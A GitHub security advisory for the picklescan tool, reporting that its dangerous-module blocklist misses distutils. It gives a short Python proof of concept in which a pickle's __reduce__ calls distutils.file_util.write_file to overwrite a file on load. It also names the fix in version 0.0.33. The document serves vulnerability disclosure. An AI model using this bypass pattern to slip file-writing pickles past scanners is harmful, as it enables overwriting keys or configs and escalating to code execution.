GHSA-m273-6v24-x4m4

Details

Summary

Picklescan has got open() and shutil in its default dangerous blocklist to prevent arbitrary file overwrites. However the module distutils isnt blocked and can be used for the same purpose ie to write arbitrary files.

Details

This is another vulnerability which impacts the downstream user.

By constructing a pickle that user distutils.file_util.write_file, an attacker can overwrite critical system files (like .ssh/authorized_keys, web server configurations, or source code) to achieve DoS or escalate to RCE.

PoC

import pickle
import distutils.file_util

class FileWriteBypass:
    def __reduce__(self):
        
        target_file = "pwned_config.env"
        content = ["print('I have overwritten your config')"]
        
        return (distutils.file_util.write_file, (target_file, content))

payload = pickle.dumps(FileWriteBypass())
with open("bypass_filewrite.pkl", "wb") as f:
    f.write(payload)

print("bypass_filewrite.pkl")

To fix this just add disutil to the blacklist

Affected Packages

PyPIpicklescan

Fixed in:

0.0.33

References

ADVISORYhttps://github.com/advisories/GHSA-m273-6v24-x4m4 PACKAGEhttps://github.com/mmaitre314/picklescan WEBhttps://github.com/mmaitre314/picklescan/commit/70c1c6c31beb6baaf52c8db1b6c3c0e84a6f9dab WEBhttps://github.com/mmaitre314/picklescan/pull/53 WEBhttps://github.com/mmaitre314/picklescan/releases/tag/v0.0.33 WEBhttps://github.com/mmaitre314/picklescan/security/advisories/GHSA-m273-6v24-x4m4

GHSA-m273-6v24-x4m4

Details

Summary

Details

PoC

Affected Packages

References

CVSS Analysis

Ecosystems

Timeline